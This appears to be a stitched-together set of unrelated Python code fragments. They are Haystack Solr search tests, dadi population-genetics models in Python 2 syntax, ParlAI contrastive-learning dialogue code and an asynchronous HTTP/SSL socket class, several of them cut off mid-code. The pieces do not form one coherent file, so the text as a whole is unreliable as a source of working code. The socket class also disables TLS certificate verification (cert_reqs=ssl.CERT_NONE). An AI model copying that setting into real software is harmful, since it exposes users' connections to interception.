self.sb.update(self.smmi, self.sample_objs)
results = self.sb.search(AltParser('dismax', "daniel1", qf='name', mm=1).prepare(self.sq))
self.assertEqual(results['hits'], 1)
# This should produce exactly the same result, since all we have are MockModel
# instances; we simply want to confirm that using the AltParser doesn't break other options:
results = self.sb.search(AltParser('dismax', 'daniel1', qf='name', mm=1).prepare(self.sq),
narrow_queries=set(('django_ct:core.mockmodel', )))
self.assertEqual(results['hits'], 1)
results = self.sb.search(AltParser('dismax', '+indexed +daniel1', qf='text name', mm=1).prepare(self.sq))
self.assertEqual(results['hits'], 1)
self.sq.add_filter(SQ(name=AltParser('dismax', 'daniel1', qf='name', mm=1)))
self.sq.add_filter(SQ(text='indexed'))
new_q = self.sq._clone()
new_q._reset()
new_q.add_filter(SQ(name='daniel1'))
new_q.add_filter(SQ(text=AltParser('dismax', 'indexed', qf='text')))
results = new_q.get_results()
self.assertEqual(len(results), 1)
self.assertEqual(results[0].id, 'core.mockmodel.1')
def test_raw_query(self):
self.sb.update(self.smmi, self.sample_objs)
# Ensure that the raw bits have proper parentheses.
new_q = self.sq._clone()
new_q._reset()
new_q.add_filter(SQ(content=Raw("{!dismax qf='title^2 text' mm=1}my query")))
results = new_q.get_results()
self.assertEqual(len(results), 0)
def test_altparser_quoting(self):
test_objs = [
MockModel(id=1, author="<NAME>", pub_date=datetime.date.today()),
MockModel(id=2, author="<NAME>", pub_date=datetime.date.today()),
]
self.sb.update(SolrQuotingMockSearchIndex(), test_objs)
results = self.sb.search(AltParser('dismax', "+don't +quuz", qf='text').prepare(self.sq))
self.assertEqual(results['hits'], 1)
def test_more_like_this(self):
self.sb.update(self.smmi, self.sample_objs)
self.assertEqual(self.raw_solr.search('*:*').hits, 3)
# A functional MLT example with enough data to work is below. Rely on
# this to ensure the API is correct enough.
self.assertEqual(self.sb.more_like_this(self.sample_objs[0])['hits'], 0)
self.assertEqual([result.pk for result in self.sb.more_like_this(self.sample_objs[0])['results']], [])
def test_build_schema(self):
old_ui = connections['default'].get_unified_index()
(content_field_name, fields) = self.sb.build_schema(old_ui.all_searchfields())
self.assertEqual(content_field_name, 'text')
self.assertEqual(len(fields), 4)
self.assertEqual(sorted(fields, key=lambda x: x['field_name']), [
{
'indexed': 'true',
'type': 'text_en',
'stored': 'true',
'field_name': 'name',
'multi_valued': 'false'
},
{
'indexed': 'true',
'field_name': 'name_exact',
'stored': 'true',
'type': 'string',
'multi_valued': 'false'
},
{
'indexed': 'true',
'type': 'date',
'stored': 'true',
'field_name': 'pub_date',
'multi_valued': 'false'
},
{
'indexed': 'true',
'type': 'text_en',
'stored': 'true',
'field_name': 'text',
'multi_valued': 'false'
},
])
ui = UnifiedIndex()
ui.build(indexes=[SolrComplexFacetsMockSearchIndex()])
(content_field_name, fields) = self.sb.build_schema(ui.all_searchfields())
self.assertEqual(content_field_name, 'text')
self.assertEqual(len(fields), 15)
fields = sorted(fields, key=lambda field: field['field_name'])
self.assertEqual(fields, [
{
'field_name': 'average_rating',
'indexed': 'true',
'multi_valued': 'false',
'stored': 'true',
'type': 'float'
},
{
'field_name': 'average_rating_exact',
'indexed': 'true',
'multi_valued': 'false',
'stored': 'true',
'type': 'float'
},
{
'field_name': 'created',
'indexed': 'true',
'multi_valued': 'false',
'stored': 'true',
'type': 'date'
},
{
'field_name': 'created_exact',
'indexed': 'true',
'multi_valued': 'false',
'stored': 'true',
'type': 'date'
},
{
'field_name': 'is_active',
'indexed': 'true',
'multi_valued': 'false',
'stored': 'true',
'type': 'boolean'
},
{
'field_name': 'is_active_exact',
'indexed': 'true',
'multi_valued': 'false',
'stored': 'true',
'type': 'boolean'
},
{
'field_name': 'name',
'indexed': 'true',
'multi_valued': 'false',
'stored': 'true',
'type': 'text_en'
},
{
'field_name': 'name_exact',
'indexed': 'true',
'multi_valued': 'false',
'stored': 'true',
'type': 'string'
},
{
'field_name': 'post_count',
'indexed': 'true',
'multi_valued': 'false',
'stored': 'true',
'type': 'long'
},
{
'field_name': 'post_count_i',
'indexed': 'true',
'multi_valued': 'false',
'stored': 'true',
'type': 'long'
},
{
'field_name': 'pub_date',
'indexed': 'true',
'multi_valued': 'false',
'stored': 'true',
'type': 'date'
},
{
'field_name': 'pub_date_exact',
'indexed': 'true',
'multi_valued': 'false',
'stored': 'true',
'type': 'date'
},
{
'field_name': 'sites',
'indexed': 'true',
'multi_valued': 'true',
'stored': 'true',
'type': 'text_en'
},
{
'field_name': | |
# We set the population sizes after the split to nu1 and nu2 in each population and set the migration rates to me12 and me21
phiI = dadi.Integration.two_pops(phiI, xx, Tam, nu1, nu2, m12=me12, m21=me21)
# After the ancient migration, the population sizes follow the growth functions bnu1_func and bnu2_func and the migration rates are set to zero
phiI = dadi.Integration.two_pops(phiI, xx, Ts, bnu1_func, bnu2_func, m12=0, m21=0)
###
## calculate the spectrum.
# oriented
fsIO = dadi.Spectrum.from_phi(phiI, (n1,n2), (xx,xx))
# mis-oriented
fsIM = dadi.Numerics.reverse_array(fsIO)
#### Calculate the spectrum in normally-recombining regions
# phi for the equilibrium ancestral population
phinr = dadi.PhiManip.phi_1D(xx)
# Now do the divergence event
phinr = dadi.PhiManip.phi_1D_to_2D(xx, phinr)
# We set the population sizes after the split to nu1 and nu2 and the migration rates to m12 and m21
phinr = dadi.Integration.two_pops(phinr, xx, Tam, nu1, nu2, m12=m12, m21=m21)
# We then let the population sizes follow bnu1_func and bnu2_func and set the migration rates to zero
phinr = dadi.Integration.two_pops(phinr, xx, Ts, bnu1_func, bnu2_func, m12=0, m21=0)
###
## calculate the spectrum.
# oriented
fsnrO = dadi.Spectrum.from_phi(phinr, (n1,n2), (xx,xx))
# mis-oriented
fsnrM = dadi.Numerics.reverse_array(fsnrO)
#### Spectrum of low-recombining regions
# phi for the equilibrium ancestral population
philr = dadi.PhiManip.phi_1D(xx)
# Now do the divergence event
philr = dadi.PhiManip.phi_1D_to_2D(xx, philr)
# We set the population sizes after the split to hrf*nu1 and hrf*nu2 and the migration rates to m12 and m21
philr = dadi.Integration.two_pops(philr, xx, Tam, nu1*hrf, nu2*hrf, m12=m12, m21=m21)
# We set the population sizes after the split to hrf*bnu1_func and hrf*bnu2_func and set the migration rates to zero
bnu1hrf_func = lambda t: (nu1 * b1**(t/Ts)) * hrf
bnu2hrf_func = lambda t: (nu2 * b2**(t/Ts)) * hrf
philr = dadi.Integration.two_pops(philr, xx, Ts, bnu1hrf_func, bnu2hrf_func, m12=0, m21=0)
###
## calculate the spectrum.
# oriented
fslrO = dadi.Spectrum.from_phi(philr, (n1,n2), (xx,xx))
# mis-oriented
fslrM = dadi.Numerics.reverse_array(fslrO)
#### Sum the spectra
fs = O*(P*fsNO + (1-P)*fsIO + (1-Q)*fsnrO + Q*fslrO) + (1-O)*(P*fsNM + (1-P)*fsIM + (1-Q)*fsnrM + Q*fslrM)
return fs
def PAM(params, (n1,n2), pts):
nu1, nu2, m12, m21, Ts, Tam, O = params
"""
Model with split, followed by two periods of ancient migration
nu1: Size of population 1 after split.
nu2: Size of population 2 after split.
m12: Migration from pop 2 to pop 1 (2*Na*m12).
m21: Migration from pop 1 to pop 2.
Ts: The scaled time between the split and the ancient migration (in units of 2*Na generations).
Tam: The scaled time between the ancient migration and the present.
n1,n2: Size of fs to generate.
O: The proportion of accurate orientation
pts: Number of points to use in grid for evaluation.
"""
# Define the grid we'll use
xx = dadi.Numerics.default_grid(pts)
# phi for the equilibrium ancestral population
phi = dadi.PhiManip.phi_1D(xx)
# Now do the divergence event
phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
# We set the population sizes after the split to nu1 and nu2 and the migration rate to m12 and m21
phi = dadi.Integration.two_pops(phi, xx, Ts, nu1, nu2, m12=m12, m21=m21)
# We keep the population sizes after the split to nu1 and nu2 and set the migration rates to zero
phi = dadi.Integration.two_pops(phi, xx, Tam, nu1, nu2, m12=0, m21=0)
# We set the population sizes after the split to nu1 and nu2 and the migration rate to m12 and m21
phi = dadi.Integration.two_pops(phi, xx, Ts, nu1, nu2, m12=m12, m21=m21)
# We keep the population sizes after the split to nu1 and nu2 and set the migration rates to zero
phi = dadi.Integration.two_pops(phi, xx, Tam, nu1, nu2, m12=0, m21=0)
# Finally, calculate the spectrum.
# oriented
fsO = dadi.Spectrum.from_phi(phi, (n1,n2), (xx,xx))
# mis-oriented
fsM = dadi.Numerics.reverse_array(fsO)
### Sum the two spectra in proportion O
fs = O*fsO+(1-O)*fsM
return fs
def SC(params, (n1,n2), pts):
nu1, nu2, m12, m21, Ts, Tsc, O = params
"""
Model with split, complete isolation, followed by secondary contact
nu1: Size of population 1 after split.
nu2: Size of population 2 after split.
m12: Migration from pop 2 to pop 1 (2*Na*m12).
m21: Migration from pop 1 to pop 2.
Ts: The scaled time between the split and the secondary contact (in units of 2*Na generations).
Tsc: The scaled time between the secondary contact and the present.
n1,n2: Size of fs to generate.
O: The proportion of accurate orientation
pts: Number of points to use in grid for evaluation.
"""
# Define the grid we'll use
xx = dadi.Numerics.default_grid(pts)
# phi for the equilibrium ancestral population
phi = dadi.PhiManip.phi_1D(xx)
# Now do the divergence event
phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
# We set the population sizes after the split to nu1 and nu2 and the migration rate to zero
phi = dadi.Integration.two_pops(phi, xx, Ts, nu1, nu2, m12=0, m21=0)
# We keep the population sizes after the split to nu1 and nu2 and set the migration rates to m12 and m21
phi = dadi.Integration.two_pops(phi, xx, Tsc, nu1, nu2, m12=m12, m21=m21)
# Finally, calculate the spectrum.
# oriented
fsO = dadi.Spectrum.from_phi(phi, (n1,n2), (xx,xx))
# mis-oriented
fsM = dadi.Numerics.reverse_array(fsO)
### Sum the two spectra in proportion O
fs = O*fsO+(1-O)*fsM
return fs
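# A minimal usage sketch (hypothetical parameter values; dadi's standard
# grid-extrapolation wrapper is assumed, as in the dadi manual):
#   >>> func_ex = dadi.Numerics.make_extrap_log_func(SC)
#   >>> model_fs = func_ex((1.0, 1.0, 0.5, 0.5, 1.0, 0.1, 0.8), (20, 20), [40, 50, 60])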
def SC2N(params, (n1,n2), pts):
nu1, nu2, hrf, m12, m21, Ts, Tsc, Q, O = params
"""
Model of semi permeability with split, complete isolation, followed by secondary contact with 2 migration rates
nu1: Size of population 1 after split.
nu2: Size of population 2 after split.
hrf: Hill-Robertson factor, i.e. the degree to which Ne is locally reduced due to the effects of background selection and selective sweep effects
m12: Migration from pop 2 to pop 1 (2*Na*m12).
m21: Migration from pop 1 to pop 2.
Ts: The scaled time between the split and the secondary contact (in units of 2*Na generations).
Tsc: The scaled time between the secondary contact and the present.
Q: The proportion of the genome with a reduced effective size due to selection at linked sites
O: The proportion of accurate orientation
n1,n2: Size of fs to generate.
pts: Number of points to use in grid for evaluation.
"""
# Define the grid we'll use
xx = dadi.Numerics.default_grid(pts)
#### Calculate the spectrum in normally-recombining regions
# phi for the equilibrium ancestral population
phinr = dadi.PhiManip.phi_1D(xx)
# Now do the divergence event
phinr = dadi.PhiManip.phi_1D_to_2D(xx, phinr)
# We set the population sizes after the split and isolation to nu1 and nu2 and set the migration rates to zero
phinr = dadi.Integration.two_pops(phinr, xx, Ts, nu1, nu2, m12=0, m21=0)
# We keep the population sizes at nu1 and nu2 and restore the migration rates to m12 and m21 for the secondary contact
phinr = dadi.Integration.two_pops(phinr, xx, Tsc, nu1, nu2, m12=m12, m21=m21)
###
## calculate the spectrum.
# oriented
fsnrO = dadi.Spectrum.from_phi(phinr, (n1,n2), (xx,xx))
# mis-oriented
fsnrM = dadi.Numerics.reverse_array(fsnrO)
#### Spectrum of low-recombining regions
# phi for the equilibrium ancestral population
philr = dadi.PhiManip.phi_1D(xx)
# Now do the divergence event
philr = dadi.PhiManip.phi_1D_to_2D(xx, philr)
# We set the population sizes after the split and isolation to hrf*nu1 and hrf*nu2 and the migration rates to zero
philr = dadi.Integration.two_pops(philr, xx, Ts, nu1*hrf, nu2*hrf, m12=0, m21=0)
# We keep the population sizes at hrf*nu1 and hrf*nu2 and set the migration rates to m12 and m21
philr = dadi.Integration.two_pops(philr, xx, Tsc, nu1*hrf, nu2*hrf, m12=m12, m21=m21)
###
## calculate the spectrum.
# oriented
fslrO = dadi.Spectrum.from_phi(philr, (n1,n2), (xx,xx))
# mis-oriented
fslrM = dadi.Numerics.reverse_array(fslrO)
### Sum the spectra
fs = O*((1-Q)*fsnrO + Q*fslrO) + (1-O)*((1-Q)*fsnrM + Q*fslrM)
return fs
def SCG(params, (n1,n2), pts):
nu1, nu2, b1, b2, m12, m21, Ts, Tsc, O = params
"""
Model with split, complete isolation, followed by secondary contact with exponential growth
nu1: Size of population 1 at split.
nu2: Size of population 2 at split.
b1: Population growth coefficient of population 1
b2: Population growth coefficient of population 2
m12: Migration from pop 2 to pop 1 (2*Na*m12).
m21: Migration from pop 1 to pop 2 (2*Na*m21).
import copy
import random
import math
import nltk
import numpy as np
import torch
from nltk.util import bigrams, trigrams
from parlai.agents.dialog_evaluator.auto_evaluator import CorpusSavedDictionaryAgent
from parlai.agents.dialog_wae.dialog_wae import make_floor
from parlai.core.message import Message
from parlai.core.metrics import AverageMetric
from parlai.core.opt import Opt
from parlai.core.torch_generator_agent import Batch
from parlai.utils.torch import padded_3d
RANDOM_SAMPLING = -1
NO_SAMPLING = -2
class SampleExtendBatch(Batch):
def __init__(self,
samp_cs_vecs=None,
samp_cs=None,
samp_rs_vecs=None,
samp_rs=None,
c_vs_samp_r_scores=None,
samp_c_vs_r_scores=None,
**kwargs):
super().__init__(
samp_cs_vecs=samp_cs_vecs,
samp_cs=samp_cs,
samp_rs_vecs=samp_rs_vecs,
samp_rs=samp_rs,
c_vs_samp_r_scores=c_vs_samp_r_scores,
samp_c_vs_r_scores=samp_c_vs_r_scores,
**kwargs
)
class SampleExtendDictionaryAgent(CorpusSavedDictionaryAgent):
def act(self):
"""
Add words in the last observation to the dictionary.
This checks any fields in the message present in the --dict-textfields
argument (e.g. "text,labels").
"""
for textfield in self.textfields:
source = self.observation.get(textfield)
if source is None:
continue
# fields may be singleton strings or lists of strings.
# wrap the singleton strings in a list to iterate over them
if type(source) is str:
source = [source]
for text in source:
if text:
items = text.split('__SAMP__')
text = items[0].strip()
tokens = self.tokenize(text)
self.add_to_dict(tokens)
unigram_ = nltk.ngrams(tokens, 1)
bigrams_ = bigrams(tokens)
trigrams_ = trigrams(tokens)
self.unigram_freq.update(unigram_)
self.bigram_freq.update(bigrams_)
self.trigram_freq.update(trigrams_)
return {'id': 'Dictionary'}
def cl_init(self, shared=None):
assert not self.opt['multigpu'], "CL training does not currently support multi-GPU training! " \
"Set --multigpu False."
self.ref_update = False
self.cl_training_steps = 0
if shared:
self.ref_agent = shared['ref_agent']
self.eval_ref_agent = shared['eval_ref_agent']
if 'neg_samples' in shared:
self.neg_samples = shared['neg_samples']
else:
if self.opt['naive_neg_sampling']:
self.neg_samples = set()
cl_build_ref_agent(self)
# loading the saved ref_agent
init_model, _ = self._get_init_model(self.opt, shared)
if init_model is not None:
import parlai.utils.pickle
states = torch.load(
init_model, map_location=lambda cpu, _: cpu, pickle_module=parlai.utils.pickle
)
load_ref_agent(self, states)
if self.use_cuda:
self.ref_agent.model.cuda()
self.eval_ref_agent.model.cuda()
def cl_share(self, shared):
shared['ref_agent'] = self.ref_agent
shared['eval_ref_agent'] = self.eval_ref_agent
if self.opt['naive_neg_sampling']:
shared['neg_samples'] = self.neg_samples
return shared
def observe_samp_expanded_observation(observation, multi_turn=False):
"""
Process incoming message in preparation for producing a response.
This includes remembering the past history of the conversation.
"""
# TODO: Migration plan: TorchAgent currently supports being passed
# observations as vanilla dicts for legacy interop; eventually we
# want to remove this behavior and demand that teachers return Messages
observation = Message(observation)
if 'text' in observation:
# ---> refactor the observation
orig_text: str = observation['text']
items = orig_text.split('__SAMP__')
real_text = items[0].strip()
samp_cs, samp_rs, c_vs_samp_r_scores, samp_c_vs_r_scores = None, None, None, None
if len(items) > 1:
samples = [d.strip() for d in items[1].split('__EOD__')]
samp_cs = [d.split('__EOC__')[0].strip() for d in samples]
samp_rs = [d.split('__EOC__')[1].strip() for d in samples]
if multi_turn:
samp_cs = [[utt.strip() for utt in samp_c.split('__EOT__')] for samp_c in samp_cs]
if len(items) > 2:
c_vs_samp_r_scores = [float(score) for score in items[2].split()]
if len(items) > 3:
samp_c_vs_r_scores = [float(score) for score in items[3].split()]
observation.force_set('text', real_text)
observation['samp_cs'] = samp_cs
observation['samp_rs'] = samp_rs
observation['c_vs_samp_r_scores'] = c_vs_samp_r_scores
observation['samp_c_vs_r_scores'] = samp_c_vs_r_scores
# <--- refactor the observation
return observation
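# The wire format parsed above looks like (field contents illustrative):
#   "<text> __SAMP__ c1 __EOC__ r1 __EOD__ c2 __EOC__ r2 __SAMP__ 0.9 -0.3 __SAMP__ 0.1 0.7"
# i.e. the real text, then sampled (context, response) pairs, then optional
# space-separated c-vs-sampled-r and sampled-c-vs-r scores.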
EMPTY = torch.zeros(0, dtype=torch.long)
def cl_batchify(self, batch):
if len(batch) == 0:
return batch
exs = batch.observations
# SAMP_CS
samp_cs, samp_cs_vecs = None, None
if any('samp_cs_vecs' in ex for ex in exs):
samp_cs = [ex.get('samp_cs', [""]) for ex in exs]
samp_cs_vecs = [ex.get('samp_cs_vecs', [EMPTY]) for ex in exs]
# SAMP_RS
samp_rs, samp_rs_vecs = None, None
if any('samp_rs_vecs' in ex for ex in exs):
samp_rs = [ex.get('samp_rs', None) for ex in exs]
samp_rs_vecs = [ex.get('samp_rs_vecs', None) for ex in exs]
# SCORES
c_vs_samp_r_scores, samp_c_vs_r_scores = None, None
if any(ex.get('c_vs_samp_r_scores') is not None for ex in exs):
# noinspection PyArgumentList
c_vs_samp_r_scores = torch.FloatTensor([ex.get('c_vs_samp_r_scores') for ex in exs])
if self.use_cuda:
c_vs_samp_r_scores = c_vs_samp_r_scores.cuda()
if any(ex.get('samp_c_vs_r_scores') is not None for ex in exs):
# noinspection PyArgumentList
samp_c_vs_r_scores = torch.FloatTensor([ex.get('samp_c_vs_r_scores') for ex in exs])
if self.use_cuda:
samp_c_vs_r_scores = samp_c_vs_r_scores.cuda()
extend_batch = SampleExtendBatch(**{k: v for k, v in batch.items()})
extend_batch.samp_cs_vecs = samp_cs_vecs
extend_batch.samp_cs = samp_cs
extend_batch.samp_rs_vecs = samp_rs_vecs
extend_batch.samp_rs = samp_rs
extend_batch.c_vs_samp_r_scores = c_vs_samp_r_scores
extend_batch.samp_c_vs_r_scores = samp_c_vs_r_scores
return extend_batch
def _set_samp_label_vec(self, obs, add_start, add_end, truncate):
if 'samp_rs' not in obs or obs['samp_rs'] is None:
return
elif 'samp_rs_vecs' in obs:
# check truncation of pre-computed vector
samp_rs_list_of_vec = []
for samp_r_vec in obs['samp_rs_vecs']:
truncated_vec = self._check_truncate(samp_r_vec, truncate)
# noinspection PyArgumentList
samp_rs_list_of_vec.append(torch.LongTensor(truncated_vec))
obs.force_set('samp_rs_vecs', samp_rs_list_of_vec)
else:
samp_rs_list_of_vec = []
for samp_r in obs['samp_rs']:
truncated_vec = self._vectorize_text(samp_r, add_start, add_end, truncate, False)
samp_rs_list_of_vec.append(truncated_vec)
obs['samp_rs_vecs'] = samp_rs_list_of_vec
return obs
def _set_samp_text_vec(self, obs, truncate):
if 'samp_cs' not in obs or obs['samp_cs'] is None:
return
if 'samp_cs_vecs' in obs:
if truncate is not None:
# check truncation of pre-computed vectors
vecs = obs['samp_cs_vecs']
for i, samp_c in enumerate(vecs):
vecs[i] = self._check_truncate(samp_c, truncate)
elif obs.get('samp_cs'):
obs['samp_cs_vecs'] = [
self._vectorize_text(samp_c, truncate=truncate)
for samp_c in obs['samp_cs']
]
return obs
def _set_samp_multi_turn_text_vec(self, obs, truncate):
if 'samp_cs' not in obs or obs['samp_cs'] is None:
return
if 'samp_cs_vecs' in obs:
if truncate is not None:
# check truncation of pre-computed vectors
vecs = obs['samp_cs_vecs']
for i, samp_c in enumerate(vecs):
vecs[i] = [self._check_truncate(c_utt, truncate) for c_utt in samp_c]
elif obs.get('samp_cs'):
obs['samp_cs_vecs'] = [
[self._vectorize_text(c_utt, truncate=truncate) for c_utt in samp_c]
for samp_c in obs['samp_cs']
]
return obs
def _log_p(self, scores, ys):
score_view = scores.view(-1, scores.size(-1))
loss = self.criterion(score_view, ys.reshape(-1))
loss = loss.view(scores.shape[:-1]).sum(dim=1) # bsz
return -loss
def _compute_sample_cl_loss(self, target_scores, target_ys, ref_scores, ref_ys, matching_scores):
log_p_m = _log_p(self, target_scores, target_ys)
log_p_n = _log_p(self, ref_scores, ref_ys)
"""
target_log_p = F.log_softmax(target_scores, -1).gather(-1, target_ys.unsqueeze(-1)).squeeze(-1) # bsz, seq_len
ref_log_p = F.log_softmax(ref_scores, -1).gather(-1, ref_ys.unsqueeze(-1)).squeeze(-1)
target_notnull = target_ys.ne(self.NULL_IDX)
ref_notnull = ref_ys.ne(self.ref_agent.NULL_IDX)
# target_tokens = target_notnull.float().sum()
target_log_p = target_log_p.masked_fill(~target_notnull, 0.)
ref_log_p = ref_log_p.masked_fill(~ref_notnull, 0.)
log_p_m = torch.sum(target_log_p, dim=-1)
log_p_n = torch.sum(ref_log_p, dim=-1)
"""
# matching_scores = matching_scores.unsqueeze(-1).expand(ys.size(0), ys.size(1)).reshape(-1)[notnull]
# log_p_m = target_log_p.view(-1)[notnull]
# log_p_n = ref_log_p.view(-1)[notnull]
g = torch.sub(log_p_m, log_p_n)
h = torch.sigmoid(g)
if self.opt.get('only_pos', False) and self.model.training:
matching_scores[matching_scores < 0] = 0.0
if self.opt.get('only_neg', False) and self.model.training:
matching_scores[matching_scores > 0] = 0.0
# noinspection PyTypeChecker
batch_cl_loss = -torch.log(torch.clamp(-matching_scores * (0.5 - h) + 0.5, 1e-20, 1e20))
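# Algebra check: with a matching score of +1 the clamped term reduces to h,
# giving a loss of -log(h); with -1 it reduces to 1 - h, giving -log(1 - h) --
# a sigmoid binary objective on the log-likelihood ratio g.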
if self.opt['cl_loss_per_token']:
target_notnull = target_ys.ne(self.NULL_IDX)
target_tokens = target_notnull.float().sum()
crt_cl_loss = torch.sum(
batch_cl_loss
) / target_tokens.sum() # average loss per token
else:
crt_cl_loss = torch.sum(
batch_cl_loss
) / target_ys.size(0) # average loss per sample
# batch_cl_loss = -matching_scores * (log_p_m - torch.log(torch.exp(log_p_m) + torch.exp(log_p_n)))
return crt_cl_loss, batch_cl_loss
def cl_build_ref_agent(self):
ref_model_file = self.opt['ref_model_file']
if ref_model_file is None or ref_model_file.lower() == "none":
raise RuntimeError("CL training requires reference model!")
else:
from parlai.core.agents import create_agent_from_opt_file
ref_agent = create_agent_from_opt_file(Opt({'model_file': ref_model_file}))
eval_ref_agent = create_agent_from_opt_file(Opt({'model_file': ref_model_file}))
if ref_agent is None:
raise RuntimeError("Build reference model failed! check your `ref_model_file`:{}!".format(ref_model_file))
if self.id == ref_agent.id and dict_same(self, ref_agent):
self.use_external_ref_model = False
else:
self.use_external_ref_model = True
# No need to do this
# # check dict
# if self.dict.tok2ind != ref_agent.dict.tok2ind or self.dict.ind2tok != ref_agent.dict.ind2tok:
# raise RuntimeError("Reference model is using different dict!")
self.eval_ref_agent = eval_ref_agent
self.ref_agent = ref_agent
def cl_state_dict(self, states):
if hasattr(self, 'ref_agent'):
states['ref_agent'] = self.ref_agent.model.state_dict()
if hasattr(self, 'eval_ref_agent'):
states['eval_ref_agent'] = self.eval_ref_agent.model.state_dict()
if hasattr(self, 'neg_samples'):
states['neg_samples'] = self.neg_samples
return states
def load_ref_agent(self, states):
if 'ref_agent' in states:
try:
self.ref_agent.model.load_state_dict(states['ref_agent'])
except RuntimeError:
raise
if 'eval_ref_agent' in states:
try:
self.eval_ref_agent.model.load_state_dict(states['eval_ref_agent'])
except RuntimeError:
raise
if 'neg_samples' in states:
self.neg_samples = states['neg_samples']
def _soft_normalize(scores, threshold=0.5):
return torch.clamp(2 * (scores + 0.5 - threshold) - 1, -1, 1)
def _hard_normalize(scores, neg_threshold, pos_threshold):
assert 0 < neg_threshold <= pos_threshold < 1
scores[scores >= pos_threshold] = 1.0
scores[scores < neg_threshold] = 0.0
return _soft_normalize(scores)
def _filter_normalize(scores, neg_threshold, pos_threshold):
assert 0 <= neg_threshold <= pos_threshold <= 1
mask_gt_neg = scores > neg_threshold
mask_lt_pos = scores < pos_threshold
scores[mask_gt_neg & mask_lt_pos] = 0.5
return _soft_normalize(scores)
def normalize_score(scores, self_opt):
# scores: ~(0, 1)
# return: ~(-1, 1)
# ret_scores = torch.tanh(-3.0 + 6.0 * scores) # ~(-1, 1)
assert (self_opt.get('soft_normalize_score', True) and self_opt.get('filter_normalize_score', False)) is not True, \
"Conflict options with both soft_normalize_score==True and filter_normalize_score==True!"
if self_opt.get('soft_normalize_score', True):
return _soft_normalize(scores, self_opt.get('cl_threshold', 0.5))
elif self_opt.get('filter_normalize_score', False):
return _filter_normalize(scores, self_opt.get('neg_threshold', 0.5), self_opt.get('pos_threshold', 0.5))
else:
return _hard_normalize(scores, self_opt.get('neg_threshold', 0.5), self_opt.get('pos_threshold', 0.5))
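# Worked example: with the default threshold of 0.5, _soft_normalize reduces
# to clamp(2*s - 1, -1, 1), so s = 0.0 -> -1.0, s = 0.5 -> 0.0, s = 1.0 -> 1.0.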
def __sample_batchify_pos(model_agent, batch, ref_agent_share_same_dict_with_target, multi_turn):
if ref_agent_share_same_dict_with_target:
return {}, {}
else:
if not ref_agent_share_same_dict_with_target and not multi_turn:
# ref_agent is another type of model, like GPT2, target_agent is seq2seq or transformer
texts = [obs['full_text'] for obs in batch.observations]
text_vec = [model_agent._vectorize_text(utt, truncate=model_agent.opt['text_truncate']) for utt in texts]
to_replace = __text_batchify(model_agent, text_vec)
else:
multi_turn_text = [[utt.strip() for utt in obs['full_text'].split(model_agent.history.delimiter)]
for obs in batch.observations]
multi_turn_text_vec = [
[model_agent._vectorize_text(
c_utt,
truncate=model_agent.opt['text_truncate']
) for c_utt in samp_c] for samp_c in multi_turn_text
]
to_replace = __text_batchify_multi_turn(model_agent, multi_turn_text_vec)
label_vec = [
model_agent._vectorize_text(
| |
'POST':
dicts = (self.default_headers, self.default_post_headers)
else:
dicts = (self.default_headers,)
for _dict in dicts:
for k in _dict:
if k not in req.headers:
req.headers[k] = _dict[k]
class AsyncHttpSocket(AsyncSocket, Events.EventMixin):
_http_vsn_str = AsyncHttpConnection._http_vsn_str
CRLF = '\r\n'
events = Events.EventMixin.events | set((
"on_connect", # args = socket
"on_connection_error", # args = socket, error
"on_close", # args = socket
"on_http_error", # args = socket, error
"on_request", # args = socket, request (Request object)
"on_request_error", # args = socket, request (Request object), error
"on_status_line", # args = socket, (httpver, code, reason)
"on_headers", # args = socket, headers (list of tuples)
"on_body", # args = socket, request (Request object), (httpver, code, reason), headers (list of tuples), body (file-like object)
))
def __init__(self, conn = None):
self._connected = False
Events.EventMixin.__init__(self)
AsyncSocket.__init__(self, conn)
self.buffer = []
self.status_line = ''
self.status = None
self.chunk_header = ''
self.current_request = None
self.current_body = stringio()
self.current_chunk = stringio()
self.current_headers = ''
self.body_length = 0
self.waiting_for = 'request'
self.set_terminator(self.CRLF)
self.ssl = False
self.ssl_want = None
self.lastbuffer = None
self._sent_data = False
def _repr(self):
return 'connected=%r' % self._connected
def close(self):
log.info('%r closing, has sent data? %r. waiting_for = %r, terminator = %r', self, self._sent_data, self.waiting_for, self.terminator)
if self.status is not None:
log.info('\tstatus = %r', self.status)
AsyncSocket.close(self)
def setup_ssl(self, ssl_cb=None):
'''
Note: this method is blocking. However, the connection is already
established and we're on the net thread. Shouldn't be too bad if we
block it for the duration of the SSL handshake.
'''
log.debug('setting up ssl on socket (waiting_for=%r): %r', self.waiting_for, self)
self.ssl = True
self.socket = ssl.wrap_socket(self.socket,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.socket.setblocking(0)
self.ssl_want = 'write'
self.ssl_cb = ssl_cb
log.debug('wrap_socket completed')
def _call_do_handshake(self):
s = self.socket
try:
log.debug('calling do_handshake()')
log.debug('sock.gettimeout() is %r', s.gettimeout())
s.do_handshake()
except ssl.SSLError, err:
if err.args[0] == ssl.SSL_ERROR_WANT_READ:
log.debug('SSL_ERROR_WANT_READ')
self.ssl_want = 'read'
elif err.args[0] == ssl.SSL_ERROR_WANT_WRITE:
log.debug('SSL_ERROR_WANT_WRITE')
self.ssl_want = 'write'
else:
raise
else:
log.debug('handshake finished.')
self.ssl_want = None
ssl_cb, self.ssl_cb = self.ssl_cb, None
if ssl_cb is not None:
ssl_cb()
def handle_read(self):
if self.ssl_want is not None:
self._call_do_handshake()
else:
return super(AsyncHttpSocket, self).handle_read()
def handle_write(self):
if self.ssl_want is not None:
self._call_do_handshake()
else:
return super(AsyncHttpSocket, self).handle_write()
def readable(self):
return self.ssl_want != 'write' and (self.ssl_want == 'read' or AsyncSocket.readable(self))
def writable(self):
return self.ssl_want != 'read' and (self.ssl_want == 'write' or AsyncSocket.writable(self))
def recv(self, buffer_size=4096):
self.ssl_want = None
try:
return super(AsyncHttpSocket, self).recv(buffer_size)
except ssl.SSLError, e:
if e.args[0] == ssl.SSL_ERROR_WANT_WRITE:
log.warning("read_want_write")
self.ssl_want = 'write'
return ""
elif e.args[0] == ssl.SSL_ERROR_WANT_READ:
log.warning("read_want_read")
self.ssl_want = 'read'
return ""
else:
raise socket.error(e)
def send(self, buf):
self.ssl_want = None
if not self.ssl:
return super(AsyncHttpSocket, self).send(buf)
r = None
if not self.lastbuffer:
try:
r = self.socket.send(buf)
except ssl.SSLError, e:
if e.args[0] == ssl.SSL_ERROR_WANT_WRITE:
log.warning("write_want_write")
self.ssl_want = 'write'
self.lastbuffer = buf # -1: store the bytes for later
